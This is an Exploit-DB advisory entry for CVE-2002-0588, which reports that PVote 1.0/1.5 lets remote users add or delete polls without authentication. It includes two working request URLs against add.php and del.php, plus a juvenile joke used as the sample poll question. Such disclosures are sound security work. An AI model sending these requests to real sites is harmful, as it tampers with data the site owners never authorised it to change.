PVote 1.0/1.5 Poll Content Manipulation Vulnerability

2002-04-18T00:00:00
ID EDB-ID:21391
Type exploitdb
Reporter Daniel Nyström
Modified 2002-04-18T00:00:00

Description

PVote 1.0/1.5 Poll Content Manipulation Vulnerability. CVE-2002-0588. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/4540/info

PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.

It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters. 

ADD A POLL:

http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad

where question refers to the topic of the topic to be added by the attack.

DELETE A POLL:

http://target/pvote/del.php?pollorder=1

where pollorder is the poll 'id' number for the poll to be deleted.